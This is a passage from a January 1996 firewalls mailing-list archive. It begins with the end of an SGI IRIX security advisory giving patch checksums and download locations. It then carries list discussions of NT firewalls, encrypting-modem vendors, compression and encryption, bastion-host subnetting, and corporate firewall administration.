456BF186B65A56EA413E9E7AD4BDE17A Filename: patchSG0001048.cadmin_sw Algorithm #1 (sum -r): 47788 698 patchSG0001048.cadmin_sw Algorithm #2 (sum): 55041 698 patchSG0001048.cadmin_sw MD5 checksum: 7E3239ED9F110567B02176EC16B93F94 Filename: patchSG0001048.eoe1_sw Algorithm #1 (sum -r): 53666 12 patchSG0001048.eoe1_sw Algorithm #2 (sum): 30809 12 patchSG0001048.eoe1_sw MD5 checksum: 32F087EB64444279DF865D104664BE47 Filename: patchSG0001048.eoe2_sw Algorithm #1 (sum -r): 01942 132 patchSG0001048.eoe2_sw Algorithm #2 (sum): 33035 132 patchSG0001048.eoe2_sw MD5 checksum: E5242DE17431D40BC5FCD49925BE3283 Filename: patchSG0001048.idb Algorithm #1 (sum -r): 37645 2 patchSG0001048.idb Algorithm #2 (sum): 10420 2 patchSG0001048.idb MD5 checksum: 460C69356D5AA920978F7A9FF49A4612 **** IRIX 6.1 **** For the IRIX operating system version 6.1, an inst-able patch has been generated and made available via anonymous ftp and/or your service/support provider. The patch is number 1090 and will install on IRIX 6.1 . The SGI anonymous ftp site is sgigate.sgi.com (204.94.209.1). Patch 1090 can be found in the following directories on the ftp server: ~ftp/Security or ~ftp/Patches/6.1 ##### Checksums #### The actual patch will be a tar file containing the following files: Filename: README.patch.1090 Algorithm #1 (sum -r): 28420 8 README.patch.1090 Algorithm #2 (sum): 59862 8 README.patch.1090 MD5 checksum: 7CA042E478210D2E90A93F9B71D31455 Filename: patchSG0001090 Algorithm #1 (sum -r): 38512 1 patchSG0001090 Algorithm #2 (sum): 37227 1 patchSG0001090 MD5 checksum: 7A266E0BFCE18322F7034BB4520C6824 Filename: patchSG0001090.cadmin_sw Algorithm #1 (sum -r): 45703 689 patchSG0001090.cadmin_sw Algorithm #2 (sum): 29950 689 patchSG0001090.cadmin_sw MD5 checksum: 9EB38D49CDDF439EE1110797FEC5BC6B Filename: patchSG0001090.idb Algorithm #1 (sum -r): 46990 1 patchSG0001090.idb Algorithm #2 (sum): 40298 1 patchSG0001090.idb MD5 checksum: 05E8F138BF0331BFEF8454074519F40A - ------------------------ - --- Acknowledgments --- - ------------------------ Silicon Graphics wishes to thank Kari E. Hurtta, FIRST members and CERT organizations worldwide for their assistance in this matter. - ----------------------------------------- - --- SGI Security Information/Contacts --- - ----------------------------------------- Past SGI Advisories and security patches can be obtained via anonymous FTP from sgigate.sgi.com or mirror site ftp.sgi.com . These security patches and advisories are provided freely to all interested parties. For issues with the patches on the FTP sites, email can be sent to cse-security-alert@csd.sgi.com . For assistance obtaining or working with security patches, please contact your SGI support provider. If there are questions about this document, email can be sent to cse-security-alert@csd.sgi.com . For reporting *NEW* SGI security issues, email can be sent to security-alert@sgi.com or contacting your SGI support provider. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBMOsB8rQ4cFApAP75AQFOlQP7Bgk7XFq+eXF9BxcaR2RBN1i7qJq/tVqh eMoswM9E55sRKgQa0pzjnpXjTcr0lgBfnof+PvQ5zmDGK9f/AQ+RcjagHtm4+3rC zvTzZd9epcAaLI5ylOx6AISWw9tBAwrL+FVtadQmvApEOW/9UcsyEedNO8gVI8hq gAwBxwRhSIk= =LA2k -----END PGP SIGNATURE----- From firewalls-owner Wed Jan 3 15:07:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA14533 for firewalls-outgoing; Wed, 3 Jan 1996 15:00:33 -0800 (PST) Received: from sheeba.rcooper.the-wire.com (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA14528 for ; Wed, 3 Jan 1996 15:00:27 -0800 (PST) Received: from rwcooper.rcooper.the-wire.com ([205.206.47.2]) by sheeba.rcooper.the-wire.com (post.office MTA v1.9.1 evaluation license) with SMTP id AAA195; Wed, 3 Jan 1996 17:58:55 -0500 Received: by rwcooper.rcooper.the-wire.com with Microsoft Mail id <01BADA69.AAE0F240@rwcooper.rcooper.the-wire.com>; Thu, 4 Jan 1996 05:58:27 -0500 Message-ID: <01BADA69.AAE0F240@rwcooper.rcooper.the-wire.com> From: Russ Cooper To: "hans@lpa.se" , "'pc@bim.be'" Cc: "firewalls@GreatCircle.COM" Subject: RE: Firewall for Windows NT? Date: Thu, 4 Jan 1996 05:58:26 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Catapult is at Beta II now, I'll be happy to tell more when I'm out from under this NDA. All I can say for now is that it will be good for *smaller* installations that are running *mostly* MS based OS's. Cheers, Russ Cooper Sr. Internet Integration Engineer SHL/Computer Innovations rcooper@the-wire.com -- rwcooper@shl.com "can someone tell me where to go today to get the money to go to where I want to go today" From firewalls-owner Wed Jan 3 16:07:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA16893 for firewalls-outgoing; Wed, 3 Jan 1996 15:52:50 -0800 (PST) Received: from netcomsv.netcom.com (uucp3.netcom.com [163.179.3.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA16886 for ; Wed, 3 Jan 1996 15:52:46 -0800 (PST) Received: by netcomsv.netcom.com with UUCP (8.6.12/SMI-4.1) id PAA28483; Wed, 3 Jan 1996 15:27:11 -0800 Received: from cc:Mail by nascar.sf.frb.org id AA820711609 Wed, 03 Jan 96 15:26:49 Date: Wed, 03 Jan 96 15:26:49 From: "Abernathy, Jim" Message-Id: <9600038207.AA820711609@nascar.sf.frb.org> To: firewalls@greatcircle.com, Chris Kostick Subject: Re: encrypting modems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris, Here is an old list of Modem Encryption vendors I had. This is old and they may have combined with another company or moved but here they are. I have worked with vendores Jones Futurex and Racal-Milgo qite a bit with some of their products. This is not an endorsement for any of these vendors: Old Security Modem Vendors List: Adaptive Computer Technologies, CA 415 324-0121 Anchor Automation, CA 818 998-6100 AT&T, NJ 201 221-2200 Bizcomp Corp, CA 408 733-7800 CASE/Datatel, Inc NJ 609 424-4451 Cermetek Microelectronics Inc, CA 408 752-5000 Codex Corp, MA 617 364-2000 Concord Data Systems Inc, MA 508 460-0808 CXR Telcom/Anderson Jacobson, CA 408 435-8520 Data Race, Inc, TX 512 692-3909 Datec, Inc, NC 800 334-7722 Digital Pathways, Inc, CA 415 964-0707 Emucom, Inc, 508 970-1189 Fastcomm Data Corp, VA 703 620-3900 Gandalf Data Inc, 312 541-6060, 800 GANDALF Jones Futurex, CA 916 632-3456 Microcom Inc, MA 508 551-1000 Natural Microsystems Corp, MA 508 655-0700 NEC America, Inc, CA 408 433-1250 Octocom Systems, MA 508 658-6050 Okidata Corp, NJ 609 235-2600 Prometheus Productions, Inc, OR 503 624-0571 Racal-Milgo, Inc, FL 305 476-5609, 800 327-4440 Racal-Vadic, Inc CA 408 946-2227 Singer Data Products Inc, IL 312 860-6500 Transend Corp, CA 415 851-3402 Tri-Data Systems Inc, CA 408 746-2900 Universal Data Systems, AL 205 721-8000 Visionary Electronics, Inc, CA 415 751-8811 Western DataCom Co, OH 216 835-1510 ZyXEL, CA 714 693-0808 Jim Abernathy FRB San Francisco 415 974-2798 ______________________________ Reply Separator _________________________________ Subject: encrypting modems Author: Chris Kostick at INET-MAIL-GATEWAY@FRB12 Date: 1/2/96 10:34 PM Received: by ccmail Received: from netcomsv.sf.frb.org by sf.frb.org (UUPC/extended 1.11) with UUCP; Tue, 02 Jan 1996 22:32:50 PST Received: from relay1.UU.NET by netcomsv.netcom.com with ESMTP (8.6.12/SMI-4.1) id WAA16335; Tue, 2 Jan 1996 22:09:47 -0800 Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP id QQzwwm26756; Wed, 3 Jan 1996 01:07:42 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222 -1) id TAA15904 for firewalls-outgoing; Tue, 2 Jan 1996 19:46:51 -0800 (PST) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.g reatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA15899 for ; Tue, 2 Jan 1996 19:46:45 -0800 (PST) Received: by relay.ashton.csc.com; id WAA16968; Tue, 2 Jan 1996 22:45:56 -0500 Received: from mccoy.ashton.csc.com(20.2.51.2) by relay.ashton.csc.com via smap ( g3.0.1) id sma016966; Tue, 2 Jan 96 22:45:47 -0500 Received: (from ckostick@localhost) by mccoy.ashton.csc.com (8.6.9/8.6.9) id WAA0 0783 for firewalls@greatcircle.com; Tue, 2 Jan 1996 22:58:55 -0500 From: Chris Kostick X-ccAdmin: Postmaster@netcomsv.sf.frb.org Message-Id: <199601030358.WAA00783@mccoy.ashton.csc.com> Subject: encrypting modems To: firewalls@greatcircle.com Date: Tue, 2 Jan 1996 22:58:55 -0500 (EST) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone provide me a list of vendors who make encrypting modems? That is, a modem with encryption in hardware rather than software on a machine just sending out over a modem. -- chris From firewalls-owner Wed Jan 3 18:11:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA21026 for firewalls-outgoing; Wed, 3 Jan 1996 18:03:49 -0800 (PST) Received: from ra1.randomc.com (ra1.randomc.com [205.160.16.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA21021 for ; Wed, 3 Jan 1996 18:03:45 -0800 (PST) Received: (llama@localhost) by ra1.randomc.com (8.6.12/8.6.10) id UAA09190; Wed, 3 Jan 1996 20:59:43 -0500 From: Jonny Llama Message-Id: <199601040159.UAA09190@ra1.randomc.com> Subject: Re: Compression is useful - but for security, not To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Information Security) Date: Wed, 3 Jan 1996 20:59:43 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <960103094524.2020153c@hobbes.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Jan 3, 96 09:45:24 am X-Info: finger llama@randomc.com | pgp -fka +force X-Mailer: ELM [version 2.4 PL22] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I rote > >> 1) Compression aids performance. It does not aid security (at best is SBO). > Julian wresponded: > >Not so! Compressed plain text, which is then ciphered is several orders > >of magnitude harder to break (depending on the compression scheme and attack). > > Any cipher scheme that is effectively strengthened by compression is not > very good encryption IMNSHO. True, if you use a rearranged XXENCODE table > as your cipher scheme, compression will make it more difficult to break > (provided you remove the headers). Triple DES or SKIPJACK is hard enough > to break that comression makes no effective difference. > > Warmly, > Padgett > Compressing data obscures redundancies in the plaintext, taking diffusion and confusion one extra step. This characteristic is found in atleast one of two of its forms in any 'good' cipher. Unless that wizzing was something flying past my head.. -llama From firewalls-owner Wed Jan 3 20:37:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA23536 for firewalls-outgoing; Wed, 3 Jan 1996 20:32:10 -0800 (PST) Received: from furnace.cybergraphic.com.au (furnace.cybergraphic.com.au [203.5.40.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA23531 for ; Wed, 3 Jan 1996 20:32:05 -0800 (PST) Received: from mailgate.cybergraphic.com.au (mailgate.cybergraphic.com.au [203.5.40.130]) by furnace.cybergraphic.com.au (8.6.12/8.6.12) with SMTP id PAA07059; Thu, 4 Jan 1996 15:33:01 +1100 Received: from ccMail by mailgate.cybergraphic.com.au (SMTPLINK V2.10.08) id AA820798228; Thu, 04 Jan 96 09:24:20 eet Date: Thu, 04 Jan 96 09:24:20 eet From: "Greg Hume" Message-Id: <9600048207.AA820798228@mailgate.cybergraphic.com.au> To: pc@bim.be, firewalls@greatcircle.com Subject: Re[2]: Firewall for Windows NT? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have tried with out success to find any information on this. could you quote you source please or point me in the right direction Thanks Greg. Systems Analyst. ______________________________ Reply Separator _________________________________ Subject: Re: Firewall for Windows NT? Author: pc@bim.be at mailgate Date: 1/4/96 5:54 AM A firewall called "catapult" is announced by Microsoft. I don't know when it will be available. Philippe -- Ph. Cayphas Senior Engineer E-Mail: pc@bim.be Telephone: +32(10)47.08.32 Fax : +32(10)47.08.11 Postal Mail : Ph. Cayphas BIM sa 4, Av. Albert Einstein 1348 Louvain-La-Neuve Belgium From firewalls-owner Wed Jan 3 21:07:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA24184 for firewalls-outgoing; Wed, 3 Jan 1996 20:58:56 -0800 (PST) Received: from hg.oro.net (hg.oro.net [198.68.62.43]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA24179 for ; Wed, 3 Jan 1996 20:58:51 -0800 (PST) From: ibg@oro.net Received: from 204.119.228.175 (ibg.oro.net [204.119.228.175]) by hg.oro.net (8.6.12/8.6.12) with SMTP id UAA09885 for ; Wed, 3 Jan 1996 20:58:11 -0800 Date: Wed, 3 Jan 1996 20:58:11 -0800 Message-Id: <199601040458.UAA09885@hg.oro.net> Subject: Re: Firewalls-Digest V5 #3 To: Firewalls@GreatCircle.COM X-Mailer: AIR Mail 3.X (SPRY, Inc.) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please stop sending these e-mails. Thanks. From firewalls-owner Wed Jan 3 21:22:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA24158 for firewalls-outgoing; Wed, 3 Jan 1996 20:58:24 -0800 (PST) Received: from hg.oro.net (hg.oro.net [198.68.62.43]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA24153 for ; Wed, 3 Jan 1996 20:58:20 -0800 (PST) From: ibg@oro.net Received: from 204.119.228.175 (ibg.oro.net [204.119.228.175]) by hg.oro.net (8.6.12/8.6.12) with SMTP id UAA09873 for ; Wed, 3 Jan 1996 20:57:40 -0800 Date: Wed, 3 Jan 1996 20:57:40 -0800 Message-Id: <199601040457.UAA09873@hg.oro.net> Subject: Re: Firewalls-Digest V5 #4 To: Firewalls@GreatCircle.COM X-Mailer: AIR Mail 3.X (SPRY, Inc.) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please stop sending these e-mails. Thanks. From firewalls-owner Wed Jan 3 21:37:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA24193 for firewalls-outgoing; Wed, 3 Jan 1996 20:59:20 -0800 (PST) Received: from hg.oro.net (hg.oro.net [198.68.62.43]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA24188 for ; Wed, 3 Jan 1996 20:59:15 -0800 (PST) From: ibg@oro.net Received: from 204.119.228.175 (ibg.oro.net [204.119.228.175]) by hg.oro.net (8.6.12/8.6.12) with SMTP id UAA09898 for ; Wed, 3 Jan 1996 20:58:34 -0800 Date: Wed, 3 Jan 1996 20:58:34 -0800 Message-Id: <199601040458.UAA09898@hg.oro.net> Subject: Re: Firewalls-Digest V5 #2 To: Firewalls@GreatCircle.COM X-Mailer: AIR Mail 3.X (SPRY, Inc.) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please stop sending these e-mails. Thanks. From firewalls-owner Wed Jan 3 23:07:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA28012 for firewalls-outgoing; Wed, 3 Jan 1996 22:57:48 -0800 (PST) Received: from relay-4.mail.demon.net (relay-4.mail.demon.net [158.152.1.64]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id WAA28007 for ; Wed, 3 Jan 1996 22:57:31 -0800 (PST) Received: from post.demon.co.uk ([158.152.1.72]) by relay-4.mail.demon.net id ab06294; 4 Jan 96 6:55 GMT Received: from mntcmp2.demon.co.uk ([158.152.99.108]) by relay-3.mail.demon.net id aa20514; 4 Jan 96 6:53 GMT Received: by mntcmp2.demon.co.uk (Smail3.1.28.1 #5) id m0tXjYF-0006JDC; Thu, 4 Jan 96 06:53 GMT Message-Id: From: Jon Whitton Subject: Bastion netmask query To: firewalls@greatcircle.com Date: Thu, 4 Jan 1996 06:53:26 +0000 (GMT) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have a class C of our own A.B.C.0 and are currently configuring the network as follows: Addresses A.B.C.1 to 15 ISP +-----------+ +-----------+ Lease | Cisco |----------------------| ftp/web | plus others ---- | 2514 | | machine | as needed Line | |----------| | | +-----------+ | +-----------+ | subnet is A.B.C.16 to 31 | | eth0 A.B.C.31 +-----------+ | Bastion | Dual Homed | Machine | | | +-----------+ | eth1 A.B.C.32 | | subnet is A.B.C.32 to 254 -------------------|------------------------ Secure Internal Can anyone confirm what the netmasks and broadcast addresses should be for the two bastion ethernet devices. We are having some trouble agreeing on these. TIA, Jon -- ================================================================================ Jon Whitton. Internet Address: jonw@mntcmp2.demon.co.uk ================================================================================ -- From firewalls-owner Thu Jan 4 00:37:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA29326 for firewalls-outgoing; Thu, 4 Jan 1996 00:25:14 -0800 (PST) Received: from dxmint.cern.ch (dxmint.cern.ch [128.141.1.113]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA29321 for ; Thu, 4 Jan 1996 00:25:10 -0800 (PST) From: gamble@dxcoms.cern.ch Received: from dxcoms.cern.ch by dxmint.cern.ch id AA07832; Thu, 4 Jan 1996 09:24:29 +0100 Received: from localhost.cern.ch by dxcoms.cern.ch; (5.65v3.0/1.1.8.2/28Jul95-0949AM) id AA23767; Thu, 4 Jan 1996 09:24:28 +0100 Message-Id: <9601040824.AA23767@dxcoms.cern.ch> To: firewalls@GreatCircle.com Cc: gamble@dxcoms.cern.ch, pdetemme@cisco.com Subject: Looking for a speaker Date: Thu, 04 Jan 96 09:24:28 +0100 X-Mts: smtp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Folks, This is not exactly a normal firewalls question, but I am looking for help on this topic on behalf of someone else:- On March 13th 1996 Cisco Systems SA (Switzerland) is organising a short seminar on security and are looking for someone who would be able to give a short presentation on this topic. If there is anyone who would be interested could they please contact Pascal DETEMMERMAN, pdetemme@cisco.com for more information. I believe the venue will be in the Geneva area. Thanks. Oh ... and happy New Year ... From firewalls-owner Thu Jan 4 03:22:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA03510 for firewalls-outgoing; Thu, 4 Jan 1996 03:10:43 -0800 (PST) Received: from tre-vta.valmet.com (tre-vta.valmet.com [139.74.39.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA03505 for ; Thu, 4 Jan 1996 03:10:37 -0800 (PST) From: PDA-BB@ccmail.valmet.com Received: (from root@localhost) by tre-vta.valmet.com (8.6.9/8.6.6) id NAA17028 for firewalls@greatcircle.com; Thu, 4 Jan 1996 13:10:30 +0200 Message-Id: <199601041110.NAA17028@tre-vta.valmet.com> Date: Thu, 4 Jan 1996 13:06 EET To: firewalls@greatcircle.com Subject: Firewalls in Many Countries Received: from cc:Mail by tre-vta.valmet.com (cc:Mail/INTERNET-router version 1.4.4) Thu, 04 Jan 96 13:10:29 EET Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------------------------------- Forwarded ---------------------------------- From: telomas@upj.com at INTERNET Date: 1/3/96 3:31PM Forwarded by: firewalls-owner@greatcircle.com at INTERNET *To: firewalls@greatcircle.com at INTERNET Subject: Firewalls in Many Countries ------------------------------------------------------------------------------- The Pharmacia and Upjohn Companies merged last November. We are merging/changing the firewalls and Internet access points within the company. How do you do that and still give adequate service levels? We have queried our ISP and only received vague answers. It has been hard for me to find knowledgeable people within companies that understand firewalls, security issues and network issues. I am a strong proponent of local administration because I do not see how you can provide adequate response time to serious problems if the people that are supporting the firewall or if the vendor that supports the firewall is across the ocean. However, others within our new company think that centralization of firewall support and firewalls is critical. There is also a group that feels does not want to "pay" for the external IP traffic running across the internal network if adequate security can be provided by adding additional firewalls. KEY QUESTIONS: How many firewalls and Internet sites of access should we have and how should they be supported? Select and support one firewall vendor? Local versus remote administration? Service Level: Respond to security problems immediately, and fix technical problems within 24 hours. Therefore, even mail could be down at a site for 24 hours although this seems like a long time to me. Management is very sensitive to the idea of the Internet and because of this, investigating unknown problems is a high priority. Users: We have a current or potential Internet user population of over 1000 users in Uppsala, Sweden; Milan, Italy; Kalamazoo, Michigan (USA); and Tsukuba, Japan. There are many other smaller sites that do (or will) receive Internet access by using the firewalls. Firewalls: We currently have two firewalls for Internet access: Kalamazoo (firewall is ANS Interlock - Solaris) Uppsala (firewall is Dec Seal). We will probably add a third in Japan shortly. Services allowed: Outbound FTP, TELNET, HTTP and of course smtp for mail. A few additional services are being piloted but have not yet been approved (WinCIM for Compuserve; SciFinder for access to an external database. Essentially anyone who has been given a TCP/IP address on an authorized network can obtain access to Internet services. TCP/IP addresses: We have one class B address and multiple class C's. From firewalls-owner Thu Jan 4 04:07:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA04341 for firewalls-outgoing; Thu, 4 Jan 1996 03:52:16 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA04336 for ; Thu, 4 Jan 1996 03:52:09 -0800 (PST) Received: from pferguso-pc.cisco.com (c1robo8.cisco.com [171.68.13.18]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id DAA21062; Thu, 4 Jan 1996 03:50:46 -0800 Message-Id: <199601041150.DAA21062@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 04 Jan 1996 06:51:13 -0500 To: Jon Whitton From: Paul Ferguson Subject: Re: Bastion netmask query Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 06:53 AM 1/4/96 +0000, Jon Whitton wrote: > >We have a class C of our own A.B.C.0 and are currently configuring the >network as follows: > This is a confusing statement [We have a class C of our own A.B.C.0...]. What exactly does it mean? It would certainly help to tell us what the network address actually is. > Addresses A.B.C.1 to 15 > > ISP +-----------+ +-----------+ > Lease | Cisco |----------------------| ftp/web | plus others > ---- | 2514 | | machine | as needed > Line | |----------| | | > +-----------+ | +-----------+ > | subnet is A.B.C.16 to 31 > | > | eth0 A.B.C.31 > +-----------+ > | Bastion | Dual Homed > | Machine | > | | > +-----------+ > | eth1 A.B.C.32 > | > | subnet is A.B.C.32 to 254 > -------------------|------------------------ Secure Internal > >Can anyone confirm what the netmasks and broadcast addresses should be for the >two bastion ethernet devices. > >We are having some trouble agreeing on these. > >TIA, Jon > Firstly, if you are using a 4 bit subnet mask on a traditional 'class c' network, then the subnet 'A.B.C.32 to 254' is an invalid subnet. I would suggest obtaining and reading RFC-1878, Variable Length Subnet Table For IPv4. - paul -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Jan 4 06:10:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA06617 for firewalls-outgoing; Thu, 4 Jan 1996 05:59:58 -0800 (PST) Received: from relay.tis.com (relay.tis.com [192.94.214.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA06612 for ; Thu, 4 Jan 1996 05:59:54 -0800 (PST) Received: by relay.tis.com; id EAA22332; Thu, 4 Jan 1996 04:01:02 -0500 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.3) id xma022330; Thu, 4 Jan 96 04:00:58 -0500 Received: from jupiter.tis.com by tis.com (4.1/SUN-5.64) id AA22198; Thu, 4 Jan 96 08:53:10 EST From: Jody C Patilla Message-Id: <9601041353.AA22198@tis.com> Subject: Re: Livingston Firewall IRX router To: firewalls@GreatCircle.COM Date: Thu, 4 Jan 1996 08:52:51 -0500 (EST) In-Reply-To: <199601032110.NAA05372@uni.ins.com> from "Kenneth Kron" at Jan 3, 96 01:10:08 pm Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > As far as the livingston IRX router I really don't know as I haven't used it. > I'd like to hear from folks who are actually using it, please. ========================================================================= Jody C. Patilla jcp@tis.com Trusted Information Systems Glenwood, Md. From firewalls-owner Thu Jan 4 07:25:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA07937 for firewalls-outgoing; Thu, 4 Jan 1996 07:04:48 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA07932 for ; Thu, 4 Jan 1996 07:04:43 -0800 (PST) Date: Thu, 4 Jan 1996 10:04:02 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960104100402.20c00896@hobbes.orl.mmc.com> Subject: Firewalls in many countries Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >It has been hard for me to find knowledgeable people within >companies that understand firewalls, security issues and network >issues. Is more complicated than that - you need someone who understands the corporate environment as well. It has strengths and weaknesses that are different from the bulk of the Internet community which is primarily military/academic/government/individuals. Believe me, operation inside a large corporation is different, not better, not worse, but different. >I am a strong proponent of local administration because I do not >see how you can provide adequate response time to serious >problems if the people that are supporting the firewall or if the >vendor that supports the firewall is across the ocean. However, >others within our new company think that centralization of >firewall support and firewalls is critical. Been there, done that, centralization is essential to security. Otherwise the preference of one component may jeopardize other elements. To avoid that there *must* be a common set of basic policies that govern all activities within the corporation. Each operating element can be permitted choices within that framework but the fact is that Internet security is a dynamic, rapidly evolving technology and a coprorate Czar is necessary to avoid endless bickering and committees that cannot respond quickly to emerging threats. The basic problem with a democratic organization is that of education of the citizens. Users (and management is a user) do no have the background and the resources are not available to give them the background necessary to make intelligent choices. So you have to select someone or a small group of people who have the background/training to make the decisions *and have the decisions applied*. >There is also a >group that feels does not want to "pay" for the external IP >traffic running across the internal network if adequate security >can be provided by adding additional firewalls. Fact: all rules are unfair to someone. Problems occur if that "someone" can obstruct "the greatest good for the greatest number". In the corporate world, doing nothing is the easiest choice. The *wrong* choice but the easiest one. >KEY QUESTIONS: How many firewalls and Internet sites of access >should we have and how should they be supported? Select and >support one firewall vendor? Local versus remote administration? That depends on your communications requirements and the level of protection rquired by the data (aka "What is the potential loss if compromised ?" - am fortunate to work for a company that has multi- billion dollar contracts so the question rarely arises. Have found that that some simplification is necessary - first except for special cases, do not worry about individual nodes, concern yourself with the networks and subnets. Have found that three sets of criteria are enough: 1) Fully exposed networks e.g. Internet connections 2) Limited exposure networks e.g. PNS leased lines to partners/customers who have signed an agreement for security 3) Internal networks. Type 1 is covered by corporate policy and has the most stringent requirements since a breach could potentially expose the enterprise. A single mechanism and corporate apporved vendor(s) are required. Types of connection permitted are limited (e.g. no UDP except DNS and that is limited to specified, trusted servers). At least two levels of protection (firewall/trusted host) are required. Type 2 has less stringent requirements and more flexibility for the site but is still somewhat constrained. The contract is considered a level of security but at least one additional level is necessary. Administration is by the site but central approval for connects is necessary. Type 3 are permitted unlimited access but no node is automatically trusted, instead networks containing sensitive material are separated by controls but may be as simple as the packet filtering provided by routers. Controls are up to the site/project/department though consulting from the central organization is available. >Service Level: Respond to security problems immediately, and fix >technical problems within 24 hours. Therefore, even mail could >be down at a site for 24 hours although this seems like a long >time to me. Management is very sensitive to the idea of the >Internet and because of this, investigating unknown problems is a >high priority. "Now" is better. I carry a beeper 24hours as do the rotating on- call staff. This must be available at each site though help desks may be centralized. What happens if the firewall goes down ? Do you have hot backup capability ? What if a backhoe takes out your trunks ? How do you determine if a security problem exists ? Do you have authority to cut off a system arbritarily (couple of years ago had to make a decision whether to shut down an entire production facility. The fact that a VP was standing there did not remove my authority to do so.) >Users: We have a current or potential Internet user population of >over 1000 users in Uppsala, Sweden; Milan, Italy; Kalamazoo, >Michigan (USA); and Tsukuba, Japan. There are many other smaller >sites that do (or will) receive Internet access by using the >firewalls. Would consider that "medium sized". Large is when you have over 5,000 at a single site or over 100,000 total) >Firewalls: We currently have two firewalls for Internet access: >Kalamazoo (firewall is ANS Interlock - Solaris) Uppsala (firewall >is Dec Seal). We will probably add a third in Japan shortly. Well that could count as a single layer - what about modems/PPP ? >Services allowed: Outbound FTP, TELNET, HTTP and of course smtp >for mail. Nobody uses GOPHER ? FINGER is blocked ? SHTP (port 443) ? Are you sure ? Just some thoughts, Padgett From firewalls-owner Thu Jan 4 07:52:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA08401 for firewalls-outgoing; Thu, 4 Jan 1996 07:40:38 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA08396 for ; Thu, 4 Jan 1996 07:40:34 -0800 (PST) Received: from cixgate by relay2.UU.NET with SMTP id QQzxbq02898; Thu, 4 Jan 1996 10:39:54 -0500 (EST) Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA27646; Thu, 4 Jan 96 07:48:42 PST Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA07331; Thu, 4 Jan 96 07:34:31 PST Date: Thu, 4 Jan 96 07:34:31 PST From: 